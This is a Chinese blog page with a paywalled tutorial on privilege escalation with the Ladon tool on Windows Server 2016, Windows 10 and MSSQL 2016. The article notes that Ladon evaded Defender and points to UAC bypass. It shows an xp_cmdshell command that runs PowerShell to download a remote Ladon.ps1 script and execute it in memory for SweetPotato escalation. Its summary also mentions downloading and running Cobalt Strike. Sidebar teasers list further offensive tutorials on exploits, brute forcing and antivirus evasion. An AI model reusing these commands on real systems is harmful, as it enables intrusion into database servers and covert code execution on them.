〖教程〗Ladon提权Win2016/Win10/MSSQL2016

最新推荐文章于 2024-01-04 16:09:44 发布
最新推荐文章于 2024-01-04 16:09:44 发布
阅读量1.8k 收藏 1
点赞数
分类专栏: 本地提权 文章标签: win10提权 bypass win2016提权 mssql提权 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/k8gege/article/details/112914404
版权
本文详细介绍了如何在Windows Server 2016和Windows 10环境中,利用Ladon进行提权操作,包括本地用户权限提升和通过MSSQL远程加载Ladon提权。在MSSQL提权部分,演示了远程内存加载PowerLadon、执行多行命令、下载并执行Cobalt Strike等步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

测试环境

Windows Server 2016
SQL: 13.0.1601.5
Microsoft Windows [Version 10.0.14393]

Ladon本地用户权限提权

网上找了些LPE,发现直接被Defender杀,病毒库更新至2021.1.19,Ladon没被杀,管理员UAC权限可通过BypassUac提权
image

MSSQL远程加载Ladon提权

执行SQL查询权限为network service

image

远程内存加载PowerLadon提权
exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxxxx.800/Ladon.ps1''); Ladon Sweet
最低0.47元/天 解锁文章
windows【系列】— CVE-2016-7255
qq_40907977的博客
05-10 2199
漏洞名称 Windows Win32k 漏洞 漏洞编号 CVE-2016-7255 MS16-135 漏洞描述 如果 Windows 内核模式驱动程序无法正确处理内存中对象,则会存在多个特升漏洞。成功利用此漏洞的攻击者可以在内核模式下运行任意代码。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户限的新帐户。 攻击者必须先登录系统,然后才能利用这些漏洞。然后攻击者可以运行一个为利用这些漏洞而经特殊设计的应用程序,从而控制受影响的系统。该更新通过更正 Windows 内核模式驱动程
Ladon 8.0五种白名单方法BypaaUAC
K8哥哥
07-15 542
什么是UAC 根据MSDN中的文档,User Account Control(UAC)是在Windows Vista 以后版本中引入的一种安全机制,针对具有有限限的账户. 通过 UAC,应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员特别授予管理员级别的系统访问限。UAC 可以阻止未经授的应用程序自动进行安装,并防止无意中更改系统设置。 BypassUAC方法 目前公开的绕过UAC的几种方式: 1.各类的UAC白名单程序的DLL劫持 2.各类自动限的COM接口利用(Elevate
Windows
haoge1998的博客
04-25 4990
Windows Windows基础知识 一、用户与用户组 在Windows中,不同用户有着不同的限。主要限包括有: 完全控制 修改 读取和执行 列出文件夹内容 读取 写入 1、内置用户 Administrator:系统管理员账号,拥有完全控制 Guest:来宾账号,基本限,默认时禁用 2、查看本地用户 net user 3、查看用户详细信息 net user darkid 用户也可以属于多个用户组,常见的用户组是 管理组(Administrators)、普通用户组(Users)、i
〖EXP〗Ladon打印机漏洞CVE-2021-1675复现
K8哥哥
07-11 2505
基本情况 6月9日,微软发布6月安全更新补丁,修复了50个安全漏洞,其中包括一个Windows Print Spooler升漏洞,漏洞CVE编号:CVE-2021-1675。未经身份验证的远程攻击者可利用该漏洞以SYSTEM限在域控制器上执行任意代码,从而获得整个域的控制。建议受影响用户及时更新漏洞补丁进行防护,做好资产自查以及预防工作,以免遭受黑客攻击。 漏洞描述 Print Spooler是Windows系统中用于管理打印相关事务的服务。 该漏洞在域环境中合适的条件下,无需任何用户交互,未经身
windows CVE-2016-3225 CVE-2014-4113 CVE-2020-0787
qq_44905657的博客
01-07 3884
windows 1、搭建环境 我们先使用一个windows server 2012 R2,搭建IIS,弄一个建议网站,传个123.aspx大马 该大马可以执行文件、命令以及上传等操作,但是他有些目录是无法操作的,我们再上传一个6.asp扫描当前指定路径的可操作路径。 其中红色表示文件可替换,蓝色表示目录可写,我们选择一个C:\windows\Temp路径操作 2、各种 我们先使用windows server 2012比较常见的几种方式,CVE-2016-3225 (MS16-075) 当攻
教程Ladon之Potato系列-windows全版本(IIS用户/服务用户)
K8哥哥
08-16 3198
Ladon之PipePotato/BadPotato/SweetPotato/PrintSpoofer 版本 >= Ladon 7.2.0 Update: 20200810 Potato原理 通过各种方法在本地NTLM中继获取SYSTEM令牌,再通过模拟令牌执行命令,通过以上方法统称为potato(不管是否基于原potato修改)。就像SQL注入,通过特定SQL语句注入获取特定数据库信息统称为SQL注入,而不管如何编写的SQL语句,是否基于别人的SQL语句修改。 条件 1 本地NTLM
Ladon8.9扫描器简明教程/用法例子
K8哥哥
05-31 8703
前言 本文仅是Ladon简单使用例子,Cobalt Strike或PowerShell版用法一致。 完整文档:http://k8gege.org/Ladon 资产扫描、指纹识别、服务识别、存活主机、端口扫描 001 多协议扫描存活主机(IP、机器名、MAC地址、制造商) Ladon 192.168.1.8/24 OnlinePC 002 多协议扫描存活主机(IP、机器名、操作系统版本、开放服务) Ladon 192.168.1.8/24 OsScan 003 扫描存活主机 Ladon 192.168.1.8
教程LadonGO免杀Win10 Defender
K8哥哥
08-03 1474
Wiki http://k8gege.org/Ladon/LadonGo.html 简介 LadonGo一款开源内网渗透扫描器框架,使用它可轻松一键探测C段、B段、A段存活主机、指纹识别、端口扫描、密码爆破、远程执行、高危漏洞检测等。3.8版本包含32个功能,高危漏洞检测MS17010、SmbGhost,远程执行SshCmd、WinrmCmd、PhpShell,12种协议密码爆破Smb/Ssh/Ftp/Mysql/Mssql/Oracle/Sqlplus/Winrm/HttpBasic/Redis/Mong
[教程]Windows下使用Ladon批量爆破SSH弱口令
K8哥哥
05-10 3814
前言 对于Linux操作系统来说,一般通过VNC、Teamviewer和SSH等工具来进行远程管理,SSH是 Secure Shell的缩写,由IETF的网络小组(Network Working Group)所制定;SSH 为建立在应用层基础上的安全协议。SSH 是目前较可靠,专为远程登录会话和其他网络服务供安全性的协议。 利用SSH协议可以有效防止远程管理过程中的信息泄露问题。SSH客户端适用于多种平台,几乎所有UNIX平台—包括HP-UX、Linux、AIX、Solaris、Digital UNIX、
教程LadonMS16-135参数版(WIN7-2016)
K8哥哥
08-08 1372
漏洞名称 Win32k 特升漏洞(MS16-135)(CVE-2016-7255) 漏洞等级 高危 漏洞类型 本地 漏洞描述 如果 Windows 内核模式驱动程序无法正确处理内存中对象,则会存在多个特升漏洞。成功利用此漏洞的攻击者可以在内核模式下运行任意代码。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户限的新帐户。 攻击者必须先登录系统,然后才能利用这些漏洞。然后攻击者可以运行一个为利用这些漏洞而经特殊设计的应用程序,从而控制受影响的系统。该更新通过更正 Windows
Ladon插件-CVE-2020-1472域控漏洞EXP
K8哥哥
09-16 1349
漏洞简述 2020年08月12日, 360CERT监测发现Windows官方 发布了 NetLogon 特升漏洞 的风险通告,该漏洞编号为 CVE-2020-1472,漏洞等级:严重,漏洞评分:10分。 攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序。 影响版本 Windows Server 2008 R2 for x64-based Systems Service Pac
windows漏洞
08-02
漏洞
Windows系统(一)
weixin_51151498的博客
08-15 692
Windows_CS上线。
最新发布
weixin_39953838的博客
01-04 1862
许多过往之人事,可想可念不可急。
Windows本地 · 上篇
qq_61553520的博客
05-31 2103
Windows本地,这种适用于有一本地个用户的基础上,有一定的限,无法从webshell上进行
升-Windows本地-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC
xiaoheizi的博客
08-30 1586
进程迁移注入就是将获取到限低的进程注入至进程中限高的中,这样就实现了升,同时注入进程相当于开启了一个后门, 隐蔽性极高,不会创建新的进程,很难发现。操作数据库的限,数据库的增删改等,源码或配置文件泄漏,也可能是网站限(webshell)进行的数据库配置文件读取获得。原理:把我的进程注入到一个现有的system账号运行的进程中,这样我的进程也就具有了system账号的限了。程序路径:Potato/source/Potato/Potato/bin/Release/Potato.exe。
Windows本地 · 下篇
qq_61553520的博客
05-31 1565
Windows本地,这种适用于有一本地个用户的基础上,有一定的限,无法从webshell上进行
Windows
qq_52178795的博客
10-20 301
Windows手法
Ladon教程:快速掌握系统扫描与指纹识别
"这篇教程介绍了Ladon的基本使用方法,它是用于资产扫描、指纹识别、服务识别、存活主机检测和端口扫描等任务的工具。Ladon支持多协议扫描,例如ICMP、SMB,并能检测特定漏洞,如MS17-010和CVE-2020-0796。此外,它...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值